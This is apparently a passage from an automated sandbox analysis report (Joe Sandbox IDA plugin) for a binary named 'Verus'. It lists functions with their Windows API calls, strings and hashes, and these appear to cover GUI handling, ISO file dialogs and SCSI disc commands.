Opcode ID: e160194a07dda8d6d09e4e1ea6038cf7c406233e6de0aa8f1e254a08119903cc
Instruction ID: c45fad0a78a74f27b9e5925b58e71273e74eaeadbc40f79ea8a5eb80a6adce5f
Opcode Fuzzy Hash: e160194a07dda8d6d09e4e1ea6038cf7c406233e6de0aa8f1e254a08119903cc
Instruction Fuzzy Hash: 26E186B15083449BD320DB65C886FFB77E4BB98704F404A1EB6DA96281E7786508CB67

Function 00472440 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 283stringtimeCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,?,flags,00000004,?,004C49AC,00000001,00000000,?,?), ref: 004725AF
lstrcatW.KERNEL32(?,?), ref: 004725BB
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004725FE
lstrcpyW.KERNEL32(?,?,flags,00000004,?,004C49AC,00000001), ref: 00472717
lstrcatW.KERNEL32(?,?), ref: 00472723
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00472766

Strings

FileTime, xrefs: 00472610, 00472778
flags, xrefs: 0047258F, 004726F7
FullPath, xrefs: 004725DD, 00472745
File%d, xrefs: 00472563, 004726CB
FileSize, xrefs: 00472794
InternalName, xrefs: 004725C8, 00472730

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Time$DateFilelstrcatlstrcpy
String ID: File%d$FileSize$FileTime$FullPath$InternalName$flags
API String ID: 4215387562-2008597225
Opcode ID: 5aa70982f9356f3dd8b7d251795248af42f5c5d21541ab41a4196646c5ecede0
Instruction ID: 78231954a918403cf8e881556aeff57e2d88229bb3c7cfd4efd96ed207aded6d
Opcode Fuzzy Hash: 5aa70982f9356f3dd8b7d251795248af42f5c5d21541ab41a4196646c5ecede0
Instruction Fuzzy Hash: 86B18170304202AFD718DF21C995EABB3E6BB88B04F10895EF54987251D778EC01CBAA

Function 00416BE0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 245stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,?,AD5E0258), ref: 00416C3C

Part of subcall function 00477190: lstrlenW.KERNEL32(?,74E2F860,?,?,00416C4B,?), ref: 0047719E
Part of subcall function 00477190: lstrlenW.KERNEL32(?,?,00416C4B,?), ref: 004771B5
Part of subcall function 00477190: lstrlenW.KERNEL32(?,?,00416C4B,?), ref: 004771D4

lstrcpyW.KERNEL32(?,00000000), ref: 00416C5E
lstrcatW.KERNEL32(?,?), ref: 00416C76
lstrcpyW.KERNEL32(?,?), ref: 00416C81
lstrcatW.KERNEL32(?,.toc), ref: 00416C90

Part of subcall function 004BE1D0: GetFileAttributesW.KERNEL32(00000000,?,?), ref: 004BE1E6

GetActiveWindow.USER32 ref: 00416D0F
EnableWindow.USER32(?,00000000), ref: 00416D87
IsWindow.USER32(?), ref: 00416DE8
ShowWindow.USER32(?,00000001), ref: 00416E07
SetWindowTextW.USER32(?,00000000), ref: 00416E75

Part of subcall function 00456FB0: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456FE4
Part of subcall function 00456FB0: lstrlenW.KERNEL32(?), ref: 00456FF5
Part of subcall function 00456FB0: lstrlenW.KERNEL32(?), ref: 00456FFF
Part of subcall function 00456FB0: _wcsncat.LIBCMT ref: 0045700C
Part of subcall function 00456FB0: SetDlgItemTextW.USER32(?,000003EF,?), ref: 00457030

Part of subcall function 00456C60: lstrcpyW.KERNEL32(?,00000000,00000000), ref: 00456C91
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CA2
Part of subcall function 00456C60: lstrlenW.KERNEL32(?), ref: 00456CB3
Part of subcall function 00456C60: _wcsncat.LIBCMT ref: 00456CC7
Part of subcall function 00456C60: _vswprintf_s.LIBCMT ref: 00456CFA

Part of subcall function 00456C60: lstrcatW.KERNEL32(?,?), ref: 00456CDE

Part of subcall function 00457630: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0045765C
Part of subcall function 00457630: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00415EAB,005391F0,00000001,00000000), ref: 00457665

Part of subcall function 00457060: GetDlgItem.USER32(?,00000001), ref: 00457071
Part of subcall function 00457060: EnableWindow.USER32(00000000,00000001), ref: 0045707C
Part of subcall function 00457060: GetDlgItem.USER32(?,00000001), ref: 00457084
Part of subcall function 00457060: SendMessageW.USER32(?,00000028,00000000,00000000), ref: 0045708F
Part of subcall function 00457060: GetDlgItem.USER32(?,00000002), ref: 0045709B
Part of subcall function 00457060: EnableWindow.USER32(00000000,00000000), ref: 004570A0
Part of subcall function 00457060: GetParent.USER32(?), ref: 004570EC
Part of subcall function 00457060: SetWindowTextW.USER32(00000000,?), ref: 004570FA
Part of subcall function 00457060: PostMessageW.USER32(?,00008001,00000000,00000000), ref: 0045712D

Part of subcall function 004431E0: MessageBoxW.USER32(?,?,?,?), ref: 00443271

Strings

(HL, xrefs: 00416DC1, 00416DC5
.toc, xrefs: 00416C83

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$lstrlen$lstrcpy$ItemMessage$EnableTextlstrcat$Send_wcsncat$ActiveAttributesFileLocalParentPostShowTime_vswprintf_s
String ID: (HL$.toc
API String ID: 2691261353-1363509580
Opcode ID: 208ad13b890dca343283864c1401f59194bc6a5dc88a0808ae2c4ec2b199ac5b
Instruction ID: 85c01ea5d0c4eaae14c2414e1f93d880fff695db502119faf23369e064f07765
Opcode Fuzzy Hash: 208ad13b890dca343283864c1401f59194bc6a5dc88a0808ae2c4ec2b199ac5b
Instruction Fuzzy Hash: AB91D7B1604345AFD320EB65D855FAF77E9FFC8304F004A1EF68593282DA78A544CB6A

Function 0042ECF0 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 206COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042ED46
DeviceIoControl.KERNEL32(?,0004D014,?,00000050,?,00000050,?,00000000), ref: 0042EDEC
GetLastError.KERNEL32 ref: 0042EDFB

Strings

DeviceIoControl failed, last error: %d., xrefs: 0042EE02
0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X, xrefs: 0042EF29, 0042EF74
0, xrefs: 0042ED6F
<, xrefs: 0042ED8E
0x%.2X, xrefs: 0042EE70
Sense:0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X, xrefs: 0042EED2
Error: SCSI command failed, returned: 0x%.2X., xrefs: 0042EE41
,0x%.2X, xrefs: 0042EE7C
CDB:, xrefs: 0042EE50

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ControlDeviceErrorLast_memset
String ID: 0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X$ CDB:$ DeviceIoControl failed, last error: %d.$ Error: SCSI command failed, returned: 0x%.2X.$ Sense:0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X$,0x%.2X$0$0x%.2X$<
API String ID: 566760104-2411004759
Opcode ID: 80a7fb8a8ca38c7faae267fd42516821a0d9b215446561acff2aafaab56d6336
Instruction ID: c6a340980f65e3a15c7112c6eced5b078cda3a96280e622633c209286c455b05
Opcode Fuzzy Hash: 80a7fb8a8ca38c7faae267fd42516821a0d9b215446561acff2aafaab56d6336
Instruction Fuzzy Hash: 366105A120C3E06AD3219BA65C12F7FBFE86FC9B05F44494FF5D482282D56C89049B7B

Function 0045EBE0 Relevance: 21.1, APIs: 14, Instructions: 149windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000049D), ref: 0045EBF2
GetWindowRect.USER32(00000000,?), ref: 0045EBFE
ScreenToClient.USER32(?,?), ref: 0045EC13
ScreenToClient.USER32(?,?), ref: 0045EC22
SendMessageW.USER32(?,00000430,00000000,?), ref: 0045EC72
SendMessageW.USER32(?,0000041E,00000014,00000000), ref: 0045EC7F
SendMessageW.USER32(00000000,00000401,00000088,00000000), ref: 0045ECB9
SendMessageW.USER32(?,00000401,00000089,00000000), ref: 0045ECC9
SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0045ECD7
SendMessageW.USER32(?,0000041D,00000000,?), ref: 0045ECEE
SendMessageW.USER32(00000000,00000418,00000000,00000000), ref: 0045ED07
SendMessageW.USER32(?,0000043A,00000000,00000000), ref: 0045ED19
SendMessageW.USER32(?,0000043A,00000000,00000000), ref: 0045ED29
SetWindowPos.USER32(00000000,00000000,00000014,00000000,00000000,00000000,00000000,?,0000043A,00000000,00000000,?,0000043A,00000000,00000000), ref: 0045ED48

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientScreenWindow$ItemRect
String ID:
API String ID: 715094304-0
Opcode ID: d6951247a749c0ace573d1dbd16eaf815782f3a2cbb7f04b2c785ca703238778
Instruction ID: e0ceb064fb13d8fd0d2772d4cd3a1d30d4dfccb1f59bb6326879b3b62c4dec0a
Opcode Fuzzy Hash: d6951247a749c0ace573d1dbd16eaf815782f3a2cbb7f04b2c785ca703238778
Instruction Fuzzy Hash: A54195B0340308BBE714DF65CC81F2BB7ADEF98744F11891DB685AB2D1C9B5E9018B68

Function 0041A390 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 135stringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00416AF0: _memset.LIBCMT ref: 00416B0B
Part of subcall function 00416AF0: lstrlenW.KERNEL32(?), ref: 00416B9B
Part of subcall function 00416AF0: lstrcpynW.KERNEL32(?,?,00000104), ref: 00416BAD

GetActiveWindow.USER32 ref: 0041A401

Part of subcall function 00416740: GetOpenFileNameW.COMDLG32(?), ref: 00416769

EnableWindow.USER32(?,00000000), ref: 0041A422
IsWindow.USER32(?), ref: 0041A481
ShowWindow.USER32(?,00000001), ref: 0041A49F
lstrcpyW.KERNEL32(00000000,?), ref: 0041A4E6
CreateThread.KERNEL32(00000000,00000000,Function_00019F50,00000000,00000000,?), ref: 0041A4FE
CloseHandle.KERNEL32(00000000), ref: 0041A505

Strings

(HL, xrefs: 0041A428
iso, xrefs: 0041A3E1
Untitled, xrefs: 0041A3DC
Disc Images (*.iso), xrefs: 0041A3D2
LHL, xrefs: 0041A3F2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$ActiveCloseCreateEnableFileHandleNameOpenShowThread_memsetlstrcpylstrcpynlstrlen
String ID: (HL$Disc Images (*.iso)$LHL$Untitled$iso
API String ID: 844575188-3525556242
Opcode ID: 16690d5ce13582961491a50e92a7310b1e718886645c7290ed41392db8ef0978
Instruction ID: 11d62454cd7603f40b8c8000479943f304fa17169beb04ac45a0f6884601c36b
Opcode Fuzzy Hash: 16690d5ce13582961491a50e92a7310b1e718886645c7290ed41392db8ef0978
Instruction Fuzzy Hash: 494184B15043816FD760EF65D995EAFBBE9FBC4304F00092FF58993281DA789844CB6A

Function 0041C040 Relevance: 21.1, APIs: 14, Instructions: 120windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(?,000000F7,00000001,00000010,00000010,00000000), ref: 0041C05C
GetDC.USER32(00000000), ref: 0041C071
GetDeviceCaps.GDI32(00000000), ref: 0041C078
ImageList_Create.COMCTL32(00000010,00000010,00000000,00000000,00000001), ref: 0041C091
ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?), ref: 0041C0A1
GetDlgItem.USER32 ref: 0041C0D5
GetDlgItem.USER32(?,000004B9), ref: 0041C0F3
SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 0041C101
GetDlgItem.USER32(?,000004B9), ref: 0041C11F
GetWindowRect.USER32(00000000,?), ref: 0041C127
ScreenToClient.USER32(?,?), ref: 0041C13C
ScreenToClient.USER32(?,?), ref: 0041C14B
GetDlgItem.USER32(?,000004B9), ref: 0041C156
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000000), ref: 0041C17B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$Image$ClientList_ScreenWindow$CapsCreateDeviceIconLoadMessageRectReplaceSend
String ID:
API String ID: 258614584-0
Opcode ID: 157ad94864e365affc8bba881772bd10e0c43f7cfe3bc0476a506ca0afd9f3ff
Instruction ID: b5f095ed94e07e8ef6f6636e954e29ee2c9fc1b213e0102e735e30b42b6cfda3
Opcode Fuzzy Hash: 157ad94864e365affc8bba881772bd10e0c43f7cfe3bc0476a506ca0afd9f3ff
Instruction Fuzzy Hash: FF416EB5640305BFD720DFA9DD89E6BB7E8EBC8700F008A1DF78597290C6B4E8448B65

Function 00468DE0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00468DEB
SelectObject.GDI32(?,00000000), ref: 00468DFD
GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00468E14
FillRect.USER32 ref: 00468E47
SetBkColor.GDI32(?,00FFFFFF), ref: 00468E53
GetSysColor.USER32(00000008), ref: 00468E5B
SetTextColor.GDI32(?,00000000), ref: 00468E63
DrawTextW.USER32(?,?,?,?,00008020), ref: 00468E7C
SelectObject.GDI32(?,?), ref: 00468E88
GetObjectW.GDI32(?,00000018,?), ref: 00468E95

Strings

!, xrefs: 00468E2B
}, xrefs: 00468E33

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Object$ColorText$Select$DrawExtentFillPoint32RectStock
String ID: !$}
API String ID: 2657830229-429005282
Opcode ID: 08e12bafdc6951a4f3b04e396bcd4e63fbb56a004dcdab02ff1f11562a803378
Instruction ID: 731a5793bd77881140f952ab3ca59f8d940241f512d986340bd33fc0c8c12ac2
Opcode Fuzzy Hash: 08e12bafdc6951a4f3b04e396bcd4e63fbb56a004dcdab02ff1f11562a803378
Instruction Fuzzy Hash: 30316D71104205AFD304DF64CD84DABB7F8FFD8314F004A1DFA5597290DB75A9058BAA

Function 00490B85 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 68memorylibraryloaderCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00490C5B,?,00415D3E), ref: 00490B87
LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,00415D3E), ref: 00490BA0
GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 00490BBA
GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 00490BC7
GetProcessHeap.KERNEL32(00000000,00000008,?,?,?,?,00415D3E), ref: 00490BF9
HeapAlloc.KERNEL32(00000000,?,?,?,?,00415D3E), ref: 00490BFC
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00490C12
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00415D3E), ref: 00490C1F
HeapFree.KERNEL32(00000000,?,?,?,?,00415D3E), ref: 00490C22

Strings

InterlockedPushEntrySList, xrefs: 00490BB4
kernel32.dll, xrefs: 00490B9B
InterlockedPopEntrySList, xrefs: 00490BBC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
API String ID: 3830925854-2586642590
Opcode ID: 97016bd45af39e79f4f8bb530276822309e1530fb1f0955a3c1c24281b88de5f
Instruction ID: 56e492716031ad5aae250b8d6a0cd17c59ead0ba0de8ee494198766c849e3232
Opcode Fuzzy Hash: 97016bd45af39e79f4f8bb530276822309e1530fb1f0955a3c1c24281b88de5f
Instruction Fuzzy Hash: 5211B276601201AFDBA09F79AD88E177FE8FBA8745B14443BF141C3310EB389801CB69

Function 00424020 Relevance: 19.6, APIs: 13, Instructions: 142windowstringCOMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,00000489), ref: 0042404E
GetParent.USER32(?), ref: 00424060
SendMessageW.USER32(00000000,00008002,00000001,00000000), ref: 00424076

Part of subcall function 0042D0C0: _memset.LIBCMT ref: 0042D124

SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004240DD
SendMessageW.USER32(?,00000149,00000000,00000000), ref: 004240FC
SendMessageW.USER32(?,00000148,00000000,?), ref: 00424114
lstrcmpW.KERNEL32(?,?), ref: 00424120
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00424134
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00424148
GetParent.USER32(?), ref: 00424176
SendMessageW.USER32(00000000,00008002,00000000,00000000), ref: 0042418C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0042419B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Parent$ButtonChecked_memsetlstrcmp
String ID:
API String ID: 3492980414-0
Opcode ID: 60b830582733bdb736581bdb581ec925502a0b0e9a10806a7793592ab3617e87
Instruction ID: 86ffdcf43c52bf6f5c94ddfdd67d4fca91be5859925d1708a67dc6f8a8c87af9
Opcode Fuzzy Hash: 60b830582733bdb736581bdb581ec925502a0b0e9a10806a7793592ab3617e87
Instruction Fuzzy Hash: A241E5713403006BE220DB65EC4AFA773A9EBC4B44F00491EF3859B2D0DA78E845CB6D

Function 0043E420 Relevance: 19.6, APIs: 13, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0043E441

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,0000044F), ref: 0043E45E
GetDlgItem.USER32(?,00000452), ref: 0043E46C
SendMessageW.USER32(?,00000143,00000000,0000044F), ref: 0043E4CA
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0043E4D9
SendMessageW.USER32(?,00000151,-00000001,00000000), ref: 0043E4E7
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0043E505
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0043E521
EnableWindow.USER32(?,00000000), ref: 0043E52F
GetDlgItem.USER32(00000000,00000001), ref: 0043E537
EnableWindow.USER32(00000000,00000000), ref: 0043E540
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0043E54F
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0043E565

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$Item$EnableLongParent$InfoParametersRectSystem
String ID:
API String ID: 2927372994-0
Opcode ID: ca84e534a2f6c12004421dbfa5f0154ae26921da3dd2359e7799b52220722ef3
Instruction ID: 08c8479d6b25c9b3c98e7088df37dbfd03cca979c0392cbbbe5f54f04d44db80
